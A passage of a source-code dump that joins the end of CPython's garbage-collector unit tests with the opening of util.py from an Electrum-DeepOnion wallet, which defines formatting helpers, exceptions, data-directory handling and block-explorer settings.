rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
def test_freeze(self):
gc.freeze()
self.assertGreater(gc.get_freeze_count(), 0)
gc.unfreeze()
self.assertEqual(gc.get_freeze_count(), 0)
def test_get_objects(self):
gc.collect()
l = []
l.append(l)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=0)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=1)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=2)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
del l
gc.collect()
def test_get_objects_arguments(self):
gc.collect()
self.assertEqual(len(gc.get_objects()),
len(gc.get_objects(generation=None)))
self.assertRaises(ValueError, gc.get_objects, 1000)
self.assertRaises(ValueError, gc.get_objects, -1000)
self.assertRaises(TypeError, gc.get_objects, "1")
self.assertRaises(TypeError, gc.get_objects, 1.234)
def test_resurrection_only_happens_once_per_object(self):
class A: # simple self-loop
def __init__(self):
self.me = self
class Lazarus(A):
resurrected = 0
resurrected_instances = []
def __del__(self):
Lazarus.resurrected += 1
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
# We start with 0 resurrections
laz = Lazarus()
self.assertEqual(Lazarus.resurrected, 0)
# Deleting the instance and triggering a collection
# resurrects the object
del laz
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
self.assertEqual(len(Lazarus.resurrected_instances), 1)
# Clearing the references and forcing a collection
# should not resurrect the object again.
Lazarus.resurrected_instances.clear()
self.assertEqual(Lazarus.resurrected, 1)
gc.collect()
self.assertEqual(Lazarus.resurrected, 1)
gc.enable()
def test_resurrection_is_transitive(self):
class Cargo:
def __init__(self):
self.me = self
class Lazarus:
resurrected_instances = []
def __del__(self):
Lazarus.resurrected_instances.append(self)
gc.collect()
gc.disable()
laz = Lazarus()
cargo = Cargo()
cargo_id = id(cargo)
# Create a cycle between cargo and laz
laz.cargo = cargo
cargo.laz = laz
# Drop the references, force a collection and check that
# everything was resurrected.
del laz, cargo
gc.collect()
self.assertEqual(len(Lazarus.resurrected_instances), 1)
instance = Lazarus.resurrected_instances.pop()
self.assertTrue(hasattr(instance, "cargo"))
self.assertEqual(id(instance.cargo), cargo_id)
gc.collect()
gc.enable()
def test_resurrection_does_not_block_cleanup_of_other_objects(self):
# When a finalizer resurrects objects, stats were reporting them as
# having been collected. This affected both collect()'s return
# value and the dicts returned by get_stats().
N = 100
class A: # simple self-loop
def __init__(self):
self.me = self
class Z(A): # resurrecting __del__
def __del__(self):
zs.append(self)
zs = []
def getstats():
d = gc.get_stats()[-1]
return d['collected'], d['uncollectable']
gc.collect()
gc.disable()
# No problems if just collecting A() instances.
oldc, oldnc = getstats()
for i in range(N):
A()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N) # instance object & its dict
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# But Z() is not actually collected.
oldc, oldnc = c, nc
Z()
# Nothing is collected - Z() is merely resurrected.
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 0)
self.assertEqual(c - oldc, 0)
self.assertEqual(nc - oldnc, 0)
# Z() should not prevent anything else from being collected.
oldc, oldnc = c, nc
for i in range(N):
A()
Z()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N)
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# The A() trash should have been reclaimed already but the
# 2 copies of Z are still in zs (and the associated dicts).
oldc, oldnc = c, nc
zs.clear()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 4)
self.assertEqual(c - oldc, 4)
self.assertEqual(nc - oldnc, 0)
gc.enable()
@unittest.skipIf(ContainerNoGC is None,
'requires ContainerNoGC extension type')
def test_trash_weakref_clear(self):
# Test that trash weakrefs are properly cleared (bpo-38006).
#
# Structure we are creating:
#
# Z <- Y <- A--+--> WZ -> C
# ^ |
# +--+
# where:
# WZ is a weakref to Z with callback C
# Y doesn't implement tp_traverse
# A contains a reference to itself, Y and WZ
#
# A, Y, Z, WZ are all trash. The GC doesn't know that Z is trash
# because Y does not implement tp_traverse. To show the bug, WZ needs
# to live long enough so that Z is deallocated before it. Then, if
# gcmodule is buggy, when Z is being deallocated, C will run.
#
# To ensure WZ lives long enough, we put it in a second reference
# cycle. That trick only works due to the ordering of the GC prev/next
# linked lists. So, this test is a bit fragile.
#
# The bug reported in bpo-38006 is caused because the GC did not
# clear WZ before starting the process of calling tp_clear on the
# trash. Normally, handle_weakrefs() would find the weakref via Z and
# clear it. However, since the GC cannot find Z, WZ is not cleared and
# it can execute during delete_garbage(). That can lead to disaster
# since the callback might tinker with objects that have already had
# tp_clear called on them (leaving them in possibly invalid states).
callback = unittest.mock.Mock()
class A:
__slots__ = ['a', 'y', 'wz']
class Z:
pass
# setup required object graph, as described above
a = A()
a.a = a
a.y = ContainerNoGC(Z())
a.wz = weakref.ref(a.y.value, callback)
# create second cycle to keep WZ alive longer
wr_cycle = [a.wz]
wr_cycle.append(wr_cycle)
# ensure trash unrelated to this test is gone
gc.collect()
gc.disable()
# release references and create trash
del a, wr_cycle
gc.collect()
# if called, it means there is a bug in the GC. The weakref should be
# cleared before Z dies.
callback.assert_not_called()
gc.enable()
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncollectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
@unittest.skipIf(BUILD_WITH_NDEBUG,
'built with -NDEBUG')
def test_refcount_errors(self):
self.preclean()
# Verify the "handling" of objects with broken refcounts
# Skip the test if ctypes is not available
import_module("ctypes")
import subprocess
code = textwrap.dedent('''
from test.support import gc_collect, SuppressCrashReport
a = [1, 2, 3]
b = [a]
# Avoid coredump when Py_FatalError() calls abort()
SuppressCrashReport().__enter__()
# Simulate the refcount of "a" being too low (compared to the
# references held on it by live data), but keeping it above zero
# (to avoid deallocating it):
import ctypes
ctypes.pythonapi.Py_DecRef(ctypes.py_object(a))
# The garbage collector should now have a fatal error
# when it reaches the broken object
gc_collect()
''')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
# Verify that stderr has a useful error message:
self.assertRegex(stderr,
br'gcmodule\.c:[0-9]+: gc_decref: Assertion "gc_get_refs\(g\) > 0" failed.')
self.assertRegex(stderr,
br'refcount is too small')
# "address : 0x7fb5062efc18"
# "address : 7FB5062EFC18"
address_regex = br'[0-9a-fA-Fx]+'
self.assertRegex(stderr,
br'object address : ' + address_regex)
self.assertRegex(stderr,
br'object refcount : 1')
self.assertRegex(stderr,
br'object type : ' + address_regex)
self.assertRegex(stderr,
br'object type name: list')
self.assertRegex(stderr,
br'object repr : \[1, 2, 3\]')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
util.py
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import time  # used by DebugMem.run() and the profiler decorator below
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'ONION':8, 'mONION':5, 'bits':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['ONION', 'mONION', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "ONION"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
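# Illustrative sketch, not part of the original module: trailing ".0" groups are
# stripped so equivalent release strings compare equal, and comparison is element-wise
# on the integer lists; the unit helpers map between a decimal-point count and its name
# (helper name below is hypothetical).
def _example_versions_and_units():
    assert normalize_version("3.2.0") == normalize_version("3.2") == [3, 2]
    assert normalize_version("3.10.1") > normalize_version("3.2.1")   # [3, 10, 1] > [3, 2, 1]
    assert decimal_point_to_base_unit_name(8) == 'ONION'
    assert base_unit_name_to_decimal_point('sat') == 0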
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Raise this exception to unwind the stack as when an error occurs;
# unlike other exceptions, the user will not be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " ONION"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
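# Illustrative sketch, not part of the original module: applying the profiler decorator
# prints the wall-clock time of each call via print_error(), so the output only appears
# with --verbose (helper names below are hypothetical).
def _example_profiled_call():
    @profiler
    def slow_sum(n):
        return sum(range(n))
    return slow_sum(10**6)   # prints e.g. "[profiler] slow_sum 0.0312" when verbose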
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_deeponion.electrum_deeponion'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-deeponion'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-deeponion")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-ONION")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-ONION")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
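# Expected outputs of format_satoshis (assuming a '.' decimal-point locale):
#   format_satoshis(1230000)                -> '0.0123'
#   format_satoshis(1230000, num_zeros=8)   -> '0.01230000'
#   format_satoshis(1230000, is_diff=True)  -> '+0.0123'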
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
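# Example: quantize_feerate(183.87) is expected to yield Decimal('183.9'),
# i.e. the rate is clipped to FEERATE_PRECISION fractional digits.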
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'explorer.deeponion.org': ('http://explorer.deeponion.org/',
{'tx': 'tx/', 'addr': 'address/'}),
'explorer2.deeponion.org': ('http://explorer.deeponion.org/',
{'tx': 'tx/', 'addr': 'address/'}),
'onionexplorer.youngwebsolutions.com': ('http://onionexplorer.youngwebsolutions.com:3001/',
{'tx': 'tx/', 'addr': 'address/'}),
'prohashing.com': ('https://prohashing.com/explorer/Deeponion',
{'tx': '/', 'addr': '/'}),
}
testnet_block_explorers = {
# 'explorer.deeponion.org': ('http://explorer.deeponion.org/',
# {'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'explorer.deeponion.org')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
